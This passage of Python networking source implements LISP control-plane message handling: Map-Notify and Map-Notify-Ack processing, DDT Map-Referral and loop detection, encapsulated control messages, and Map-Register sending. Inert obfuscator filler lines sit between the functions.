    eid_records = map_notify.eid_records

    for i in range(map_notify.record_count):
        eid_record = lisp_eid_record()
        eid_records = eid_record.decode(eid_records)

        #
        # Bug fix: test the value just decoded ('eid_records'), not the
        # stale 'packet' variable, so a truncated EID-record aborts here
        # instead of crashing in the RLOC-record decode below.
        #
        if (eid_records == None): return
        eid_record.print_record("  ", False)

        #
        # Find an existing map-cache entry, or create one when gleaning
        # is allowed for this (S,G).
        #
        mc = lisp_map_cache_lookup(eid_record.eid, eid_record.group)
        if (mc == None):
            allow, r1, r2 = lisp_allow_gleaning(eid_record.eid,
                eid_record.group, None)
            if (allow == False): continue

            mc = lisp_mapping(eid_record.eid, eid_record.group, [])
            mc.add_cache()
        #endif

        #
        # Gleaned entries are maintained by the data-plane only; do not
        # let a Map-Notify overwrite them.
        #
        if (mc.gleaned):
            lprint("Ignore Map-Notify for gleaned {}".format(
                green(mc.print_eid_tuple(), False)))
            continue
        #endif

        mc.mapping_source = None if source == "lisp-etr" else source
        mc.map_cache_ttl = eid_record.store_ttl()

        #
        # A record with no RLOC-records clears the stored RLOC-set.
        #
        if (len(mc.rloc_set) != 0 and eid_record.rloc_count == 0):
            mc.rloc_set = []
            mc.build_best_rloc_set()
            lisp_write_ipc_map_cache(True, mc)
            lprint("Update {} map-cache entry with no RLOC-set".format(
                green(mc.print_eid_tuple(), False)))
            continue
        #endif

        rtrs_present = mc.rtrs_in_rloc_set()

        #
        # Decode RLOC-records; only (S,G) records carrying an RLE are
        # stored.
        #
        for j in range(eid_record.rloc_count):
            rloc_record = lisp_rloc_record()
            eid_records = rloc_record.decode(eid_records, None)
            rloc_record.print_record("    ")
            if (eid_record.group.is_null()): continue
            if (rloc_record.rle == None): continue

            #
            # Preserve packet statistics from the old first RLOC, if any.
            #
            stats = mc.rloc_set[0].stats if len(mc.rloc_set) != 0 else None

            rloc = lisp_rloc()
            rloc.store_rloc_from_record(rloc_record, None, mc.mapping_source)
            if (stats != None): rloc.stats = copy.deepcopy(stats)

            #
            # When RTRs are in the RLOC-set, only accept RTR RLOCs.
            #
            if (rtrs_present and rloc.is_rtr() == False): continue

            mc.rloc_set = [rloc]
            mc.build_best_rloc_set()
            lisp_write_ipc_map_cache(True, mc)

            lprint("Update {} map-cache entry with RLE {}".format(
                green(mc.print_eid_tuple(), False),
                rloc.rle.print_rle(False)))
        #endfor
    #endfor
    return
if 41 - 41: Ii1I % Ii1I * oO0o - I11i + iIii1I11I1II1 . ooOoO0o
if 30 - 30: Ii1I * iII111i . II111iiii / i1IIi
if 77 - 77: oO0o . IiII + I1ii11iIi11i . i1IIi
if 49 - 49: I1Ii111 . OoooooooOO / o0oOOo0O0Ooo - iII111i - iII111i - i11iIiiIii
if 37 - 37: OOooOOo
if 79 - 79: I1Ii111 - OoO0O00 + ooOoO0o + oO0o . i11iIiiIii + i1IIi
if 32 - 32: IiII . ooOoO0o / OoO0O00 / iII111i . iIii1I11I1II1 % IiII
if 28 - 28: I1Ii111 + OoooooooOO + IiII . ooOoO0o . I1IiiI / oO0o
def lisp_process_map_notify(lisp_sockets, orig_packet, source):
    """
    Process a Map-Notify received by the lisp-core process.  Authenticate
    it when it carries authentication data, print its first EID-record and
    RLOC-records, forward (S,G) Map-Notifies to the lisp-itr process, and
    answer the sender with a Map-Notify-Ack.  Returns None.
    """
    map_notify = lisp_map_notify("")
    packet = map_notify.decode(orig_packet)
    if (packet == None):
        lprint("Could not decode Map-Notify packet")
        return
    #endif

    map_notify.print_notify()

    #
    # When authentication data is present, locate the Map-Server by the
    # source address and verify the hash.  Otherwise fabricate a
    # placeholder lisp_ms so the ack path has something to work with.
    #
    addr_str = source.print_address()
    if (map_notify.alg_id != 0 or map_notify.auth_len != 0):
        ms = None
        for ms_key in lisp_map_servers_list:
            if (ms_key.find(addr_str) == -1): continue
            ms = lisp_map_servers_list[ms_key]
        #endfor
        if (ms == None):
            lprint(("  Could not find Map-Server {} to authenticate " +
                "Map-Notify").format(addr_str))
            return
        #endif

        ms.map_notifies_received += 1

        auth_good = lisp_verify_auth(packet, map_notify.alg_id,
            map_notify.auth_data, ms.password)

        lprint("  Authentication {} for Map-Notify".format("succeeded" if \
            auth_good else "failed"))
        if (auth_good == False): return
    else:
        ms = lisp_ms(addr_str, None, "", 0, "", False, False, False, False, 0,
            0, 0, None)
    #endif

    #
    # No EID-records: just ack the Map-Notify and we are done.
    #
    eid_records = map_notify.eid_records
    if (map_notify.record_count == 0):
        lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
        return
    #endif

    #
    # Decode and print the first EID-record and all its RLOC-records.
    #
    eid_record = lisp_eid_record()
    packet = eid_record.decode(eid_records)
    if (packet == None): return

    eid_record.print_record("  ", False)

    for j in range(eid_record.rloc_count):
        rloc_record = lisp_rloc_record()
        packet = rloc_record.decode(packet, None)
        if (packet == None):
            lprint("  Could not decode RLOC-record in Map-Notify packet")
            return
        #endif
        rloc_record.print_record("    ")
    #endfor

    #
    # (S,G) Map-Notifies are handed to the lisp-itr process over IPC.
    #
    if (eid_record.group.is_null() == False):
        lprint("Send {} Map-Notify IPC message to ITR process".format(
            green(eid_record.print_eid_tuple(), False)))

        ipc = lisp_control_packet_ipc(orig_packet, addr_str, "lisp-itr", 0)
        lisp_ipc(ipc, lisp_sockets[2], "lisp-core-pkt")
    #endif

    #
    # Ack the Map-Notify back to the sender.
    #
    lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
    return
if 8 - 8: OoO0O00 . OoO0O00
if 29 - 29: I11i + OoooooooOO % o0oOOo0O0Ooo - I1Ii111
if 45 - 45: II111iiii - OOooOOo / oO0o % O0 . iII111i . iII111i
if 82 - 82: iIii1I11I1II1 % Oo0Ooo * i1IIi - I1Ii111 - I1ii11iIi11i / iII111i
if 24 - 24: IiII
if 95 - 95: IiII + OoOoOO00 * OOooOOo
if 92 - 92: OoOoOO00 + ooOoO0o . iII111i
if 59 - 59: iIii1I11I1II1 % I1Ii111 + I1ii11iIi11i . OoOoOO00 * Oo0Ooo / I1Ii111
def lisp_process_map_notify_ack ( packet , source ) :
    """Process a received Map-Notify-Ack control message.

    packet: raw Map-Notify-Ack bytes (starting at the LISP header).
    source: address object of the sender, used for logging and for the
        retransmit-queue lookup.

    Decodes the message, authenticates it with the registering site's
    auth-key when authentication data is present, cancels the pending
    retransmit timer, and removes the acknowledged Map-Notify from the
    global retransmit queue. Returns None in all cases.
    """
    map_notify = lisp_map_notify("")
    packet = map_notify.decode(packet)
    if (packet == None):
        lprint("Could not decode Map-Notify-Ack packet")
        return

    map_notify.print_notify()

    # At least one EID-record is needed to locate the site whose
    # auth-key authenticates this Map-Notify-Ack.
    if (map_notify.record_count < 1):
        lprint("No EID-prefix found, cannot authenticate Map-Notify-Ack")
        return

    eid_record = lisp_eid_record()
    if (eid_record.decode(map_notify.eid_records) == None):
        lprint("Could not decode EID-record, cannot authenticate " +
            "Map-Notify-Ack")
        return

    eid_record.print_record(" ", False)
    eid_str = eid_record.print_eid_tuple()

    # Verify authentication when the sender included it.
    if (map_notify.alg_id != LISP_NONE_ALG_ID and map_notify.auth_len != 0):
        site_eid = lisp_sites_by_eid.lookup_cache(eid_record.eid, True)
        if (site_eid == None):
            not_found = bold("Site not found", False)
            lprint("{} for EID {}, cannot authenticate Map-Notify-Ack".format(not_found, green(eid_str, False)))
            return

        site = site_eid.site

        site.map_notify_acks_received += 1

        # Fall back to key-id 0 when the advertised key-id is not
        # configured for this site. (`in` replaces the Python-2-only
        # dict.has_key and works on both Python 2 and 3.)
        key_id = map_notify.key_id
        if ((key_id in site.auth_key) == False): key_id = 0
        auth_key = site.auth_key[key_id]

        auth_good = lisp_verify_auth(packet, map_notify.alg_id,
            map_notify.auth_data, auth_key)

        key_id = "key-id {}".format(key_id) if key_id == map_notify.key_id \
            else "bad key-id {}".format(map_notify.key_id)

        lprint(" Authentication {} for Map-Notify-Ack, {}".format("succeeded" if auth_good else "failed", key_id))
        if (auth_good == False): return

    # Stop retransmitting the acknowledged Map-Notify and dequeue it.
    if (map_notify.retransmit_timer): map_notify.retransmit_timer.cancel()

    source_str = source.print_address()
    queue_key = map_notify.nonce_key

    if (queue_key in lisp_map_notify_queue):
        map_notify = lisp_map_notify_queue.pop(queue_key)
        if (map_notify.retransmit_timer): map_notify.retransmit_timer.cancel()
        lprint("Dequeue Map-Notify from retransmit queue, key is: {}".format(queue_key))
    else:
        lprint("Map-Notify with nonce 0x{} queue entry not found for {}".format(map_notify.nonce_key, red(source_str, False)))
    return
if 51 - 51: I1IiiI
if 72 - 72: ooOoO0o / I1ii11iIi11i . Ii1I * iII111i . iIii1I11I1II1
if 35 - 35: OoO0O00 . OoOoOO00 % O0 * OoO0O00
if 68 - 68: OOooOOo
if 87 - 87: IiII * IiII - OoO0O00 / I1ii11iIi11i + OOooOOo / i11iIiiIii
if 21 - 21: o0oOOo0O0Ooo / oO0o + oO0o + Oo0Ooo / o0oOOo0O0Ooo
if 39 - 39: i11iIiiIii - OoO0O00 - i11iIiiIii / OoooooooOO
if 15 - 15: i1IIi . iII111i + IiII / I1ii11iIi11i - i1IIi / iII111i
def lisp_map_referral_loop ( mr , eid , group , action , s ) :
    """Detect a referral loop for a queued DDT Map-Request.

    mr: queued map-request entry (carries last_cached_prefix [eid, group]).
    eid/group: EID-prefix (and group, for multicast) from the received
        referral record.
    action: referral action code; only NODE/MS referrals can loop.
    s: sender address string, used for logging only.

    Returns True (loop detected) when the newly referred prefix is not
    more-specific than the previously cached one, i.e. the referral
    chain is making no forward progress.
    """
    if (action not in (LISP_DDT_ACTION_NODE_REFERRAL,
        LISP_DDT_ACTION_MS_REFERRAL)): return(False)

    # Nothing cached yet, so no loop is possible.
    if (mr.last_cached_prefix[0] == None): return(False)

    # For (S,G) entries compare the group first, then the EID/source.
    looping = False
    if (group.is_null() == False):
        looping = mr.last_cached_prefix[1].is_more_specific(group)
    if (looping == False):
        looping = mr.last_cached_prefix[0].is_more_specific(eid)

    if (looping):
        eid_str = lisp_print_eid_tuple(eid, group)
        cached_str = lisp_print_eid_tuple(mr.last_cached_prefix[0],
            mr.last_cached_prefix[1])

        lprint(("Map-Referral prefix {} from {} is not more-specific " + "than cached prefix {}").format(green(eid_str, False), s,
            cached_str))
    return(looping)
if 91 - 91: O0 * I1Ii111 . iIii1I11I1II1
if 1 - 1: I11i
if 12 - 12: ooOoO0o - Oo0Ooo / OoO0O00 . I1ii11iIi11i / OOooOOo
if 51 - 51: ooOoO0o % I11i + IiII + oO0o + O0 % ooOoO0o
if 38 - 38: OoO0O00 - iIii1I11I1II1 % ooOoO0o + I1ii11iIi11i - Ii1I
if 69 - 69: OOooOOo / OoooooooOO % ooOoO0o % iIii1I11I1II1 / OoO0O00 + iIii1I11I1II1
if 47 - 47: II111iiii % O0 / I1IiiI / iIii1I11I1II1 * I11i
def lisp_process_map_referral ( lisp_sockets , packet , source ) :
    """Process a received Map-Referral message (LISP-DDT).

    lisp_sockets: socket array used by follow-up sends.
    packet: Map-Referral payload following the LISP control header.
    source: address object of the referring DDT/MS node.

    For each EID-record: correlates it with a queued Map-Request by
    nonce, updates (or creates) the referral-cache entry, merges the
    advertised RLOC-set of referral nodes, and advances the pending
    Map-Request state machine according to the referral action code.
    """
    map_referral = lisp_map_referral()
    packet = map_referral.decode(packet)
    if (packet == None):
        lprint("Could not decode Map-Referral packet")
        return

    map_referral.print_map_referral()

    source_str = source.print_address()
    nonce = map_referral.nonce

    for _ in range(map_referral.record_count):
        eid_record = lisp_eid_record()
        packet = eid_record.decode(packet)
        if (packet == None):
            lprint("Could not decode EID-record in Map-Referral packet")
            return

        eid_record.print_record(" ", True)

        # Correlate the referral with a queued Map-Request via the nonce.
        key = str(nonce)
        if (key not in lisp_ddt_map_requestQ):
            lprint(("Map-Referral nonce 0x{} from {} not found in " + "Map-Request queue, EID-record ignored").format(lisp_hex_string(nonce), source_str))
            continue

        mr = lisp_ddt_map_requestQ[key]
        if (mr == None):
            lprint(("No Map-Request queue entry found for Map-Referral " +
                "nonce 0x{} from {}, EID-record ignored").format(lisp_hex_string(nonce), source_str))
            continue

        # Drop the request when the referral chain is looping (new
        # prefix not more-specific than the last cached one).
        if (lisp_map_referral_loop(mr, eid_record.eid, eid_record.group,
            eid_record.action, source_str)):
            mr.dequeue_map_request()
            continue

        mr.last_cached_prefix[0] = eid_record.eid
        mr.last_cached_prefix[1] = eid_record.group

        # Find or create the referral-cache entry for this prefix.
        new_entry = False
        referral = lisp_referral_cache_lookup(eid_record.eid, eid_record.group,
            True)
        if (referral == None):
            new_entry = True
            referral = lisp_referral()
            referral.eid = eid_record.eid
            referral.group = eid_record.group
            if (eid_record.ddt_incomplete == False): referral.add_cache()
        elif (referral.referral_source.not_set()):
            lprint("Do not replace static referral entry {}".format(green(referral.print_eid_tuple(), False)))
            mr.dequeue_map_request()
            continue

        action = eid_record.action
        referral.referral_source = source
        referral.referral_type = action
        ttl = eid_record.store_ttl()
        referral.referral_ttl = ttl
        referral.expires = lisp_set_timestamp(ttl)

        # Track the referring node's up/down state based on whether this
        # referral is negative. (`in` replaces Python-2-only has_key.)
        negative = referral.is_referral_negative()
        if (source_str in referral.referral_set):
            ref_node = referral.referral_set[source_str]

            if (ref_node.updown == False and negative == False):
                ref_node.updown = True
                lprint("Change up/down status for referral-node {} to up".format(source_str))
            elif (ref_node.updown == True and negative == True):
                ref_node.updown = False
                lprint(("Change up/down status for referral-node {} " + "to down, received negative referral").format(source_str))

        # Mark every existing referral-node for deletion; nodes still
        # present in the received RLOC-set are unmarked below.
        delete_set = {}
        for node_key in referral.referral_set: delete_set[node_key] = None

        # Merge the RLOC-records into the referral-node set.
        for _ in range(eid_record.rloc_count):
            rloc_record = lisp_rloc_record()
            packet = rloc_record.decode(packet, None)
            if (packet == None):
                lprint("Could not decode RLOC-record in Map-Referral packet")
                return

            rloc_record.print_record(" ")

            addr_str = rloc_record.rloc.print_address()
            if ((addr_str in referral.referral_set) == False):
                ref_node = lisp_referral_node()
                ref_node.referral_address.copy_address(rloc_record.rloc)
                referral.referral_set[addr_str] = ref_node
                if (source_str == addr_str and negative): ref_node.updown = False
            else:
                ref_node = referral.referral_set[addr_str]
                if (addr_str in delete_set): delete_set.pop(addr_str)

            ref_node.priority = rloc_record.priority
            ref_node.weight = rloc_record.weight

        # Remove referral-nodes that are no longer advertised.
        for node_key in delete_set: referral.referral_set.pop(node_key)

        eid_str = referral.print_eid_tuple()

        if (new_entry):
            if (eid_record.ddt_incomplete):
                lprint("Suppress add {} to referral-cache".format(green(eid_str, False)))
            else:
                lprint("Add {}, referral-count {} to referral-cache".format(green(eid_str, False), eid_record.rloc_count))
        else:
            lprint("Replace {}, referral-count: {} in referral-cache".format(green(eid_str, False), eid_record.rloc_count))

        # Act on the referral action code.
        if (action == LISP_DDT_ACTION_DELEGATION_HOLE):
            # Hole in the delegation: negative Map-Reply with 15-minute TTL.
            lisp_send_negative_map_reply(mr.lisp_sockets, referral.eid,
                referral.group, mr.nonce, mr.itr, mr.sport, 15, None, False)
            mr.dequeue_map_request()

        if (action == LISP_DDT_ACTION_NOT_AUTH):
            if (mr.tried_root):
                # Even the root is not authoritative — give up, TTL 0.
                lisp_send_negative_map_reply(mr.lisp_sockets, referral.eid,
                    referral.group, mr.nonce, mr.itr, mr.sport, 0, None, False)
                mr.dequeue_map_request()
            else:
                lisp_send_ddt_map_request(mr, True)

        if (action == LISP_DDT_ACTION_MS_NOT_REG):
            if (source_str in referral.referral_set):
                ref_node = referral.referral_set[source_str]
                ref_node.updown = False

            if (len(referral.referral_set) == 0):
                mr.dequeue_map_request()
            else:
                lisp_send_ddt_map_request(mr, False)

        if (action in (LISP_DDT_ACTION_NODE_REFERRAL,
            LISP_DDT_ACTION_MS_REFERRAL)):
            if (mr.eid.is_exact_match(eid_record.eid)):
                if (not mr.tried_root):
                    lisp_send_ddt_map_request(mr, True)
                else:
                    lisp_send_negative_map_reply(mr.lisp_sockets,
                        referral.eid, referral.group, mr.nonce, mr.itr,
                        mr.sport, 15, None, False)
                    mr.dequeue_map_request()
            else:
                lisp_send_ddt_map_request(mr, False)

        if (action == LISP_DDT_ACTION_MS_ACK): mr.dequeue_map_request()
    return
if 30 - 30: I1IiiI % oO0o * OoooooooOO
if 64 - 64: I1IiiI
if 11 - 11: I1ii11iIi11i % iII111i / II111iiii % ooOoO0o % IiII
if 14 - 14: ooOoO0o / IiII . o0oOOo0O0Ooo
if 27 - 27: I1IiiI - OOooOOo . II111iiii * I1ii11iIi11i % ooOoO0o / I1IiiI
if 90 - 90: o0oOOo0O0Ooo / I1ii11iIi11i - oO0o - Ii1I - I1IiiI + I1Ii111
if 93 - 93: I1IiiI - I11i . I1IiiI - iIii1I11I1II1
if 1 - 1: O0 . Ii1I % Ii1I + II111iiii . oO0o
def lisp_process_ecm ( lisp_sockets , packet , source , ecm_port ) :
    """Process an Encapsulated-Control-Message (ECM).

    lisp_sockets: socket array handed through to the Map-Request handler.
    packet: ECM bytes (outer ECM header plus the inner control message).
    source: address object of the outer-header sender.
    ecm_port: UDP port the ECM arrived on.

    Decodes the ECM header, verifies the inner message is a Map-Request,
    and hands the inner packet to lisp_process_map_request() together
    with the inner source address and UDP source port.
    """
    ecm = lisp_ecm(0)
    packet = ecm.decode(packet)
    if (packet == None):
        lprint("Could not decode ECM packet")
        return

    ecm.print_ecm()

    # Peek at the inner control header to learn the message type.
    header = lisp_control_header()
    if (header.decode(packet) == None):
        lprint("Could not decode control header")
        return

    msg_type = header.type
    del(header)

    # Only Map-Requests are expected inside an ECM.
    if (msg_type != LISP_MAP_REQUEST):
        lprint("Received ECM without Map-Request inside")
        return

    sport = ecm.udp_sport
    lisp_process_map_request(lisp_sockets, packet, source, ecm_port,
        ecm.source, sport, ecm.ddt, -1)
    return
if 17 - 17: OOooOOo % i11iIiiIii
if 63 - 63: I1ii11iIi11i + I1ii11iIi11i % Ii1I + II111iiii / OoooooooOO / I1IiiI
if 64 - 64: Oo0Ooo / OOooOOo * II111iiii
if 70 - 70: OoOoOO00 - I11i
if 50 - 50: I1ii11iIi11i
if 9 - 9: I11i % I11i . OoOoOO00 / OOooOOo / OoooooooOO
if 21 - 21: O0 . I1Ii111
if 2 - 2: O0 % OoOoOO00 + oO0o
if 24 - 24: iII111i + iII111i - OoooooooOO % OoooooooOO * O0
if 51 - 51: IiII
def lisp_send_map_register ( lisp_sockets , packet , map_register , ms ) :
    """Authenticate, optionally encrypt, and send a Map-Register.

    lisp_sockets: sockets used by lisp_send().
    packet: pre-built Map-Register message bytes.
    map_register: the lisp_map_register object describing the message.
    ms: map-server configuration entry (address, password, keys).
    """
    dest = ms.map_server

    # LISP-Decent push mode: on the very first Map-Register to a
    # multicast peer-group, send to loopback instead — presumably to
    # bootstrap via the local lisp-core first (TODO confirm).
    if (lisp_decent_push_configured and dest.is_multicast_address() and
        (ms.map_registers_multicast_sent == 1 or ms.map_registers_sent == 1)):
        dest = copy.deepcopy(dest)
        dest.address = 0x7f000001  # 127.0.0.1
        banner = bold("Bootstrap", False)
        group_str = ms.map_server.print_address_no_iid()
        lprint("{} mapping system for peer-group {}".format(banner, group_str))

    # Compute the authentication hash over the message.
    packet = lisp_compute_auth(packet, map_register, ms.password)

    # When an encryption key is configured, encrypt everything after the
    # first 4 bytes with the ChaCha stream cipher.
    if (ms.ekey != None):
        key = ms.ekey.zfill(32)
        iv = "0" * 8
        ciphertext = chacha.ChaCha(key, iv).encrypt(packet[4::])
        packet = packet[0:4] + ciphertext
        encrypt_str = bold("Encrypt", False)
        lprint("{} Map-Register with key-id {}".format(encrypt_str, ms.ekey_id))

    decent_str = ""
    if (lisp_decent_pull_xtr_configured()):
        decent_str = ", decent-index {}".format(bold(ms.dns_name, False))

    lprint("Send Map-Register to map-server {}{}{}".format(dest.print_address(), ", ms-name '{}'".format(ms.ms_name), decent_str))

    lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
    return
if 68 - 68: II111iiii . iIii1I11I1II1
if 23 - 23: iIii1I11I1II1 + I1Ii111 + I1IiiI - i11iIiiIii % IiII % i1IIi
if 24 - 24: OOooOOo - OoOoOO00 - i1IIi + O0 + I1IiiI . o0oOOo0O0Ooo
if 97 - 97: I1Ii111 + Ii1I * ooOoO0o
if 95 - 95: O0
if 61 - 61: Oo0Ooo % O0 . Ii1I - OOooOOo - o0oOOo0O0Ooo
if 71 - 71: iIii1I11I1II1
if 10 - 10: OoooooooOO - iII111i . i1IIi % oO0o . OoooooooOO + OOooOOo
def lisp_send_ipc_to_core ( lisp_socket , packet , dest , port ) :
    """Forward a control packet to the lisp-core process over IPC.

    lisp_socket: IPC socket; its own socket name is used as the IPC source.
    packet: raw control-packet bytes to forward.
    dest, port: final destination address object and UDP port.
    """
    source = lisp_socket.getsockname()
    dest = dest.print_address_no_iid()

    lprint("Send IPC {} bytes to {} {}, control-packet: {}".format(len(packet), dest, port, lisp_format_packet(packet)))

    packet = lisp_control_packet_ipc(packet, source, dest, port)
    lisp_ipc(packet, lisp_socket, "lisp-core-pkt")
    return
if 78 - 78: oO0o * I11i . i1IIi % i1IIi + i1IIi / OOooOOo
if 66 - 66: OoooooooOO % o0oOOo0O0Ooo / I11i * I1Ii111
if 12 - 12: I1Ii111
if 17 - 17: I1Ii111 % oO0o + O0
if 15 - 15: o0oOOo0O0Ooo - OoooooooOO % ooOoO0o % oO0o / i11iIiiIii / Oo0Ooo
if 59 - 59: iII111i + O0 - I1ii11iIi11i * I1ii11iIi11i + iIii1I11I1II1
if 41 - 41: iIii1I11I1II1 . O0 - ooOoO0o / OoOoOO00 % iIii1I11I1II1 + IiII
if 23 - 23: OoOoOO00 + ooOoO0o . i11iIiiIii
def lisp_send_map_reply ( lisp_sockets , packet , dest , port ) :
    """Log and hand a Map-Reply to the lisp-core process for delivery."""
    addr_str = dest.print_address_no_iid()
    lprint("Send Map-Reply to {}".format(addr_str))
    core_socket = lisp_sockets[2]
    lisp_send_ipc_to_core(core_socket, packet, dest, port)
if 39 - 39: OoOoOO00 - I1ii11iIi11i / I1Ii111
if 48 - 48: IiII - oO0o + I11i % o0oOOo0O0Ooo
if 81 - 81: Oo0Ooo . I1Ii111 * iIii1I11I1II1
if 60 - 60: OoooooooOO
if 41 - 41: iIii1I11I1II1 + O0 % o0oOOo0O0Ooo - IiII . I11i * O0
if 39 - 39: i11iIiiIii . Ii1I
if 68 - 68: OOooOOo * ooOoO0o . I1IiiI - iII111i
if 81 - 81: I11i % Oo0Ooo / iII111i
def lisp_send_map_referral ( lisp_sockets , packet , dest , port ) :
    """Log and hand a Map-Referral to the lisp-core process for delivery."""
    addr_str = dest.print_address()
    lprint("Send Map-Referral to {}".format(addr_str))
    core_socket = lisp_sockets[2]
    lisp_send_ipc_to_core(core_socket, packet, dest, port)
if 44 - 44: Oo0Ooo
if 90 - 90: Oo0Ooo . ooOoO0o / IiII * I1Ii111 . ooOoO0o + II111iiii
if 43 - 43: iIii1I11I1II1 % OOooOOo + OoOoOO00 + I1ii11iIi11i - Oo0Ooo / Ii1I
if 94 - 94: Ii1I / Oo0Ooo % II111iiii % Oo0Ooo * oO0o
if 54 - 54: O0 / ooOoO0o * I1Ii111
if 5 - 5: Ii1I / OoOoOO00 - O0 * OoO0O00
if 13 - 13: IiII + Oo0Ooo - I1Ii111
if 10 - 10: OOooOOo % OoooooooOO / I1IiiI . II111iiii % iII111i
def lisp_send_map_notify ( lisp_sockets , packet , dest , port ) :
    """Log and hand a Map-Notify to the lisp-core process for delivery."""
    addr_str = dest.print_address()
    lprint("Send Map-Notify to xTR {}".format(addr_str))
    core_socket = lisp_sockets[2]
    lisp_send_ipc_to_core(core_socket, packet, dest, port)
if 47 - 47: o0oOOo0O0Ooo . i11iIiiIii * i1IIi % I11i - ooOoO0o * oO0o
if 95 - 95: oO0o / Ii1I + OoO0O00
if 57 - 57: iIii1I11I1II1 + I1Ii111 % oO0o - Ii1I . I1IiiI
if 39 - 39: OoO0O00 + II111iiii
if 98 - 98: O0 - I1Ii111 % oO0o - iII111i + Ii1I * i1IIi
if 76 - 76: o0oOOo0O0Ooo
if 55 - 55: OOooOOo + I1ii11iIi11i * Oo0Ooo
def lisp_send_ecm ( lisp_sockets , packet , inner_source , inner_sport , inner_dest ,
    outer_dest , to_etr = False , to_ms = False , ddt = False ) :
    """Encapsulate a control packet in an ECM header and send it.

    lisp_sockets: sockets used by lisp_send().
    packet: inner control-message bytes to encapsulate.
    inner_source/inner_sport: inner header source address and UDP port;
        a null/None source defaults to inner_dest.
    inner_dest: inner header destination address.
    outer_dest: outer destination the ECM is sent to.
    to_etr/to_ms/ddt: ECM flag bits; to-etr/to-ms are only set when the
        corresponding local process is running.
    """
    if (inner_source == None or inner_source.is_null()):
        inner_source = inner_dest

    # With NAT-traversal, use a translated port as the inner UDP source
    # port — presumably so replies traverse the NAT (TODO confirm).
    if (lisp_nat_traversal):
        translated_port = lisp_get_any_translated_port()
        if (translated_port != None): inner_sport = translated_port

    ecm = lisp_ecm(inner_sport)

    ecm.to_etr = to_etr if lisp_is_running("lisp-etr") else False
    ecm.to_ms = to_ms if lisp_is_running("lisp-ms") else False
    ecm.ddt = ddt
    ecm_header = ecm.encode(packet, inner_source, inner_dest)
    if (ecm_header == None):
        lprint("Could not encode ECM message")
        return

    ecm.print_ecm()

    packet = ecm_header + packet

    addr_str = outer_dest.print_address_no_iid()
    lprint("Send Encapsulated-Control-Message to {}".format(addr_str))
    dest = lisp_convert_4to6(addr_str)
    lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
    return
if 97 - 97: I1Ii111
if 55 - 55: Oo0Ooo
if 20 - 20: i11iIiiIii - Oo0Ooo
if 47 - 47: iII111i * ooOoO0o . I1IiiI / O0
if 81 - 81: iII111i + I11i - I1ii11iIi11i + iIii1I11I1II1 / ooOoO0o
if 60 - 60: iIii1I11I1II1 - OoO0O00
if 11 - 11: IiII + I1IiiI . Ii1I * I1IiiI - OoooooooOO . II111iiii
# Address-Family Identifiers used in LISP records. The negative values
# appear to be internal pseudo-AFIs used for cache key construction
# (see lisp_cache.build_key), not on-the-wire values.
LISP_AFI_GEO_COORD = - 3
LISP_AFI_IID_RANGE = - 2
LISP_AFI_ULTIMATE_ROOT = - 1
LISP_AFI_NONE = 0
LISP_AFI_IPV4 = 1
LISP_AFI_IPV6 = 2
LISP_AFI_MAC = 6
LISP_AFI_E164 = 8
LISP_AFI_NAME = 17
LISP_AFI_LCAF = 16387
if 74 - 74: o0oOOo0O0Ooo . iIii1I11I1II1 * Ii1I / O0 - I1Ii111 % oO0o
# RLOC reachability / admin states.
LISP_RLOC_UNKNOWN_STATE = 0
LISP_RLOC_UP_STATE = 1
LISP_RLOC_DOWN_STATE = 2
LISP_RLOC_UNREACH_STATE = 3
LISP_RLOC_NO_ECHOED_NONCE_STATE = 4
LISP_RLOC_ADMIN_DOWN_STATE = 5
if 98 - 98: IiII
# Authentication algorithm identifiers.
LISP_AUTH_NONE = 0
LISP_AUTH_MD5 = 1
LISP_AUTH_SHA1 = 2
LISP_AUTH_SHA2 = 3
if 30 - 30: iIii1I11I1II1 - ooOoO0o / iIii1I11I1II1 / I1IiiI + OoOoOO00 - iIii1I11I1II1
if 69 - 69: i11iIiiIii . O0
if 21 - 21: i1IIi . OoO0O00 % I11i + II111iiii % o0oOOo0O0Ooo
if 17 - 17: i11iIiiIii + oO0o * iII111i . II111iiii
if 44 - 44: I1ii11iIi11i
if 39 - 39: iII111i + Oo0Ooo / oO0o
if 95 - 95: I1Ii111 * oO0o / ooOoO0o . Ii1I . OoOoOO00
# Host mask-lengths (bits) for each supported address family.
LISP_IPV4_HOST_MASK_LEN = 32
LISP_IPV6_HOST_MASK_LEN = 128
LISP_MAC_HOST_MASK_LEN = 48
LISP_E164_HOST_MASK_LEN = 60
if 99 - 99: I1IiiI * II111iiii
if 84 - 84: II111iiii - I1IiiI
if 41 - 41: iIii1I11I1II1 % I1Ii111 % OoOoOO00
if 35 - 35: I11i + i1IIi
if 85 - 85: Ii1I * Ii1I . OoOoOO00 / Oo0Ooo
if 97 - 97: oO0o % iIii1I11I1II1
def byte_swap_64 ( address ) :
    """Return the low 64 bits of `address` with byte order reversed.

    Example: 0x0123456789abcdef -> 0xefcdab8967452301. Only the low
    8 bytes are considered; the result is always a non-negative int.
    """
    swapped = (((address & 0x00000000000000ff) << 56) |
               ((address & 0x000000000000ff00) << 40) |
               ((address & 0x0000000000ff0000) << 24) |
               ((address & 0x00000000ff000000) << 8) |
               ((address & 0x000000ff00000000) >> 8) |
               ((address & 0x0000ff0000000000) >> 24) |
               ((address & 0x00ff000000000000) >> 40) |
               ((address & 0xff00000000000000) >> 56))
    return (swapped)
if 64 - 64: oO0o . OOooOOo * i11iIiiIii + I1Ii111
if 88 - 88: O0
if 75 - 75: iII111i - Oo0Ooo / OoooooooOO - O0
if 36 - 36: OoO0O00 % Ii1I . Oo0Ooo
if 90 - 90: i11iIiiIii - iII111i * oO0o
if 79 - 79: IiII
if 38 - 38: I1Ii111
if 56 - 56: i11iIiiIii
if 58 - 58: i11iIiiIii / OoOoOO00
if 23 - 23: I1IiiI % iIii1I11I1II1 - oO0o - iII111i - o0oOOo0O0Ooo
if 39 - 39: Oo0Ooo . OoO0O00
if 74 - 74: I1IiiI . O0 . IiII + IiII - IiII
if 100 - 100: ooOoO0o / OoooooooOO
if 73 - 73: i11iIiiIii - Oo0Ooo
if 100 - 100: iIii1I11I1II1 + I1Ii111
class lisp_cache_entries ( ) :
    """One mask-length bucket of a lisp_cache: a dict of entries plus a
    sorted list of its keys for ordered traversal."""
    def __init__ ( self ) :
        # Keys are the strings produced by lisp_cache.build_key().
